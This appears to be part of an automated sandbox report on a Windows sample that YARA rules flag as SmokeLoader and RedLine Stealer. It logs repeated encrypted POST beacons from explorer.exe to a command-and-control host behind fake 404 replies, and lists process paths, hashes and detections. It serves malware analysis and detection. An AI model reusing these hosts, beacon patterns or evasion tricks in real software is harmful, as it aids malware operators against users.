Apr 26, 2024 11:49:18.365525007 CEST	295	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 43 49 c6 92 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuCI_f}x0zfgd#(#(4(>"RD#hyO_(Bl#uaOJA(wSIk4`u)s:$p
Apr 26, 2024 11:49:19.557686090 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.5	49734	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:23.641505003 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://tboygovgxqdbv.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 147 Host: nidoe.org
Apr 26, 2024 11:49:23.641547918 CEST	147	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 32 07 bb 8a Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu2jz^7;ZbGXrwOv3A:b*]B
Apr 26, 2024 11:49:24.831507921 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:24 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49735	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:30.712687016 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ovkuafudign.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 147 Host: nidoe.org
Apr 26, 2024 11:49:30.712704897 CEST	147	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 71 55 c9 89 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuqUY,_[rqpDY0:(MMWZT[U&cj
Apr 26, 2024 11:49:31.674782991 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:31 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49736	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:35.592735052 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xbqpttmfpoa.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 269 Host: nidoe.org
Apr 26, 2024 11:49:35.592763901 CEST	269	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5e 39 d4 90 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu^9gWedn]^Km:B+2T@!]HI?C%bbOY_51CJ'\|b0X@l&#0vh^vi")}
Apr 26, 2024 11:49:36.786492109 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:36 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49737	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:40.768532991 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://rskpmxlavjxbjtbs.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 116 Host: nidoe.org
Apr 26, 2024 11:49:40.768552065 CEST	116	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 31 3e c8 af Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu1>QWPM1Q$]Y
Apr 26, 2024 11:49:41.952558041 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:41 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49738	119.204.11.2	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:47.864492893 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://hphdpqnonfmpdqxq.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 198 Host: nidoe.org
Apr 26, 2024 11:49:47.864531994 CEST	198	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 23 27 e3 e6 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu#'xEoYA[&iwwm)vn7T8f#M=tsvQjQiS-r9Q
Apr 26, 2024 11:49:49.062968016 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:48 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49739	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:49:56.135561943 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qakjjulmdxb.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 180 Host: nidoe.org
Apr 26, 2024 11:49:56.135561943 CEST	180	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 5a 07 ad f9 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuZE"QhN`kaiz<\|pIwcR_7m;!S(_f6d)D;D7{
Apr 26, 2024 11:49:56.765465975 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:49:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49740	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:02.490715027 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://jljckibghorwl.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 296 Host: nidoe.org
Apr 26, 2024 11:50:02.490747929 CEST	296	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 6c 54 c2 fc Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vulT{3yY(JO{<sRcFZCA%5xJ4M}>_qmF:H^>BjpmSKa3)S\N*}qt/"o
Apr 26, 2024 11:50:03.125268936 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49741	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:07.106115103 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ypaypqoyqmujr.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: nidoe.org
Apr 26, 2024 11:50:07.106133938 CEST	125	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 67 45 c7 85 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vugE[MTQvnn7&d`8FF-3
Apr 26, 2024 11:50:07.750643969 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.5	49742	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:11.655695915 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xqmcfngarfr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 229 Host: nidoe.org
Apr 26, 2024 11:50:11.655695915 CEST	229	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 66 07 c9 b8 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vufmVtMyZ[Bcu3SlDU,}84XJLBHhJ\|7w8*/q$yV$X;{gc2Qp
Apr 26, 2024 11:50:12.415462971 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:12 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.5	49743	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:16.085963964 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://crqwqadvlmh.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 348 Host: nidoe.org
Apr 26, 2024 11:50:16.085999012 CEST	348	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 45 25 e4 80 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuE%a]O^\|qN^(w.wp#(lTFULO&bvB+H~LIHGDmiGtI)1X.cu4oI8aPi
Apr 26, 2024 11:50:17.080611944 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:16 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49744	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:23.070924997 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ibixnemdysifgd.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 123 Host: nidoe.org
Apr 26, 2024 11:50:23.070951939 CEST	123	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4a 32 ef 9b Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuJ2`Bwx_b:VH1+<;1;
Apr 26, 2024 11:50:23.940831900 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:23 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49745	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:28.180860996 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://owewxdswvpurak.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 125 Host: nidoe.org
Apr 26, 2024 11:50:28.180893898 CEST	125	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 73 53 d7 b6 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vusSBX'*O6fNx=,3
Apr 26, 2024 11:50:28.836678982 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:28 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49746	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:32.759541035 CEST	281	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oykcjyefevftfd.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 134 Host: nidoe.org
Apr 26, 2024 11:50:32.759586096 CEST	134	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 33 47 be aa Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu3GRLieY~py\|.uoV6I.d
Apr 26, 2024 11:50:33.775856972 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:33 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49747	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:39.540791988 CEST	280	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://ybjmbdiflbije.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 149 Host: nidoe.org
Apr 26, 2024 11:50:39.540822983 CEST	149	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 4d 1b fb a5 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuM~(l?V}=e4i&T_pMRIa&85>
Apr 26, 2024 11:50:40.280530930 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:40 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49748	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:44.236303091 CEST	278	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://uwbpryoiwnr.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 282 Host: nidoe.org
Apr 26, 2024 11:50:44.236303091 CEST	282	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 2b 36 f0 b6 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu+6\.kNmERL$3jHOG7j{K,<r;HUVdV:NlWD\d,7eq>oMs{tRBw]]t
Apr 26, 2024 11:50:44.900590897 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:44 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49749	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:49.712608099 CEST	283	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://oycdwmonhjrtmcya.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 253 Host: nidoe.org
Apr 26, 2024 11:50:49.712645054 CEST	253	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 5e f9 91 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vuB^uE^\vkaI?OHNt4$XgT_E0E/:m0v3&tvF@+7'+AcJ)z/Zm J3f
Apr 26, 2024 11:50:50.460535049 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:50 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49750	190.187.52.42	80	1028	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 11:50:57.657191992 CEST	282	OUT	POST /tmp/index.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://iscsxhjipsydnvm.org/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 153 Host: nidoe.org
Apr 26, 2024 11:50:57.657213926 CEST	153	OUT	Data Raw: 3b 6e 56 18 8d cf 68 24 d7 ac b0 0b 70 00 7b ce 77 7d c0 e7 1a 75 90 66 0c 7e 0e 94 45 b3 c1 18 93 2a c2 20 75 1d 51 6b ee 9b 3f c2 23 31 de ed 7c d7 4a 37 ef 20 0f f7 4d 40 17 7f 4e e2 19 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 40 3a bf 81 Data Ascii: ;nVh$p{w}uf~E* uQk?#1\|J7 M@NA .[k,vu@:+bps3*`Gf.2ykk6MIb!.VD\|4-
Apr 26, 2024 11:50:58.315697908 CEST	177	IN	HTTP/1.1 404 Not Found Server: nginx/1.24.0 Date: Fri, 26 Apr 2024 09:50:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/7.4.33 Data Raw: 03 00 00 00 72 e8 84 Data Ascii: r

Target ID:	0
Start time:	11:46:51
Start date:	26/04/2024
Path:	C:\Users\user\Desktop\rBwTlpgnjc.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\rBwTlpgnjc.exe"
Imagebase:	0x400000
File size:	305'152 bytes
MD5 hash:	EE4E08FEBD22E594C7BCB70EA1B0252A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2058725868.0000000004140000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2058699871.0000000004130000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2059007895.0000000004344000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.2058891382.00000000042F1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:46:57
Start date:	26/04/2024
Path:	C:\Windows\explorer.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\Explorer.EXE
Imagebase:	0x7ff674740000
File size:	5'141'208 bytes
MD5 hash:	662F4F92FDE3557E86D110526BB578D5
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	11:47:17
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\ivfjsrs
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ivfjsrs
Imagebase:	0x400000
File size:	305'152 bytes
MD5 hash:	EE4E08FEBD22E594C7BCB70EA1B0252A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000004.00000002.2298449396.00000000041A0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000004.00000002.2298381632.0000000004064000.00000040.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2298532365.00000000041D1000.00000004.10000000.00040000.00000000.sdmp, Author: unknown Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000004.00000002.2298471164.00000000041B0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 44%, Virustotal, Browse
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	11:50:01
Start date:	26/04/2024
Path:	C:\Users\user\AppData\Roaming\ivfjsrs
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Roaming\ivfjsrs
Imagebase:	0x400000
